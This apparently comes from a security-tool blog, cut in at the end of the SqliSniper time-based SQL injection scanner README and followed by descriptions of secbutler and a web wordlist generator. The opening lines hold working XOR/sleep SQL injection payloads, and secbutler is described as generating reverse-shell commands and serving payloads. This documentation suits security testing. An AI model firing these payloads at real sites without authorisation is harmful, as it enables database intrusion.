0\"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR\"Z
"0"XOR(if(now()=sysdate()%2Csleep(%__TIME_OUT__%)%2C0))XOR"Z"
0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z

Scanning with Single Payloads

If you want to test with only a single payload, the --single-payload flag can be used. Make sure to replace the sleep time with %__TIME_OUT__%.

./sqlisniper.py -r url.txt --single-payload "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"

Scanning Custom Header

Headers are read from the file headers.txt. To scan a custom header, save the custom HTTP request header in the headers.txt file.

ubuntu:~/sqlisniper$ cat headers.txt 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
X-Forwarded-For: 127.0.0.1

Sending Discord Alert Notifications

SqliSniper also offers Discord alert notifications, enhancing its functionality by providing real-time alerts through Discord webhooks. This feature proves invaluable during large-scale scans, allowing prompt notifications upon detection.

./sqlisniper.py -r url.txt --discord <web_hookurl>

Multi-Threading

Threads can be defined with --threads flag

 ./sqlisniper.py -r url.txt --threads 10

Note: It is crucial to consider that employing a higher number of threads might lead to potential false positives or overlooking valid issues. Due to the nature of time-based SQL injection, it is recommended to use a lower thread count for more accurate detection.


SqliSniper is made in Python with lots of <3 by @Muhammad Danial.



Secbutler - The Perfect Butler For Pentesters, Bug-Bounty Hunters And Security Researchers

By: Zion3R
14 February 2024 at 11:30

Essential utilities for pentester, bug-bounty hunters and security researchers

secbutler is a utility tool made for pentesters, bug-bounty hunters and security researchers that contains the most used and tedious stuff commonly needed while performing cybersecurity activities (like installing sec-related tools, retrieving commands for revshells, serving common payloads, obtaining a working proxy, managing wordlists and so forth).

The goal is to obtain a tool that meets the requirements of the community, therefore suggestions and PRs are very welcome!


Features
  • Generate a reverse shell command
  • Obtain proxy
  • Download & deploy common payloads
  • Obtain reverse shell listener command
  • Generate bash install script for common tools
  • Generate bash download script for Wordlists
  • Read common cheatsheets and payloads

Usage
secbutler -h

This will display the help for the tool

                   __          __  __
________ _____/ /_ __ __/ /_/ /__ _____
/ ___/ _ \/ ___/ __ \/ / / / __/ / _ \/ ___/
(__ ) __/ /__/ /_/ / /_/ / /_/ / __/ /
/____/\___/\___/_.___/\__,_/\__/_/\___/_/

v0.1.9 - https://github.com/groundsec/secbutler

Essential utilities for pentester, bug-bounty hunters and security researchers

Usage:
secbutler [flags]
secbutler [command]

Available Commands:
cheatsheet Read common cheatsheets & payloads
help Help about any command
listener Obtain the command to start a reverse shell listener
payloads Obtain and serve common payloads
proxy Obtain a random proxy from FreeProxy
revshell Obtain the command for a reverse shell
tools Generate a install script for the most common cybersecurity tools
version Print the current version
wordlists Generate a download script for the most common wordlists

Flags:
-h, --help help for secbutler

Use "secbutler [command] --help" for more information about a command.



Installation

Run the following command to install the latest version:

go install github.com/groundsec/secbutler@latest

Or you can simply grab an executable from the Releases page.


License

secbutler is made with πŸ–€ by the GroundSec team and released under the MIT LICENSE.



WEB-Wordlist-Generator - Creates Related Wordlists After Scanning Your Web Applications

By: Zion3R
15 February 2024 at 11:30


WEB-Wordlist-Generator scans your web applications and creates related wordlists to take preliminary countermeasures against cyber attacks.
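The core idea can be sketched in a few lines of Python (a toy illustration, not the project's implementation; the tokenization rule and minimum length are assumptions):

# Toy sketch: fetch a page and turn the tokens found in its HTML into a wordlist.
import re
import requests

def build_wordlist(url, min_len=3):
    html = requests.get(url, timeout=10).text
    words = re.findall(r"[A-Za-z0-9_-]{%d,}" % min_len, html)
    return sorted(set(w.lower() for w in words))

for word in build_wordlist("https://target-web.com"):
    print(word)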


Done
  • [x] Scan Static Files.
  • [ ] Scan Metadata Of Public Documents (pdf,doc,xls,ppt,docx,pptx,xlsx etc.)
  • [ ] Create a New Associated Wordlist with the Wordlist Given as a Parameter.

Installation

From Git
git clone https://github.com/OsmanKandemir/web-wordlist-generator.git
cd web-wordlist-generator && pip3 install -r requirements.txt
python3 generator.py -d target-web.com

From Dockerfile

You can run this application in a container after building the Dockerfile.

docker build -t webwordlistgenerator .
docker run webwordlistgenerator -d target-web.com -o

From DockerHub

You can run this application on a container after pulling from DockerHub.

docker pull osmankandemir/webwordlistgenerator:v1.0
docker run osmankandemir/webwordlistgenerator:v1.0 -d target-web.com -o

Usage
-d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS] Input Multi or Single Targets. --domains target-web1.com target-web2.com
-p PROXY, --proxy PROXY Use HTTP proxy. --proxy 0.0.0.0:8080
-a AGENT, --agent AGENT Use agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
-o PRINT, --print PRINT Use Print outputs on terminal screen.


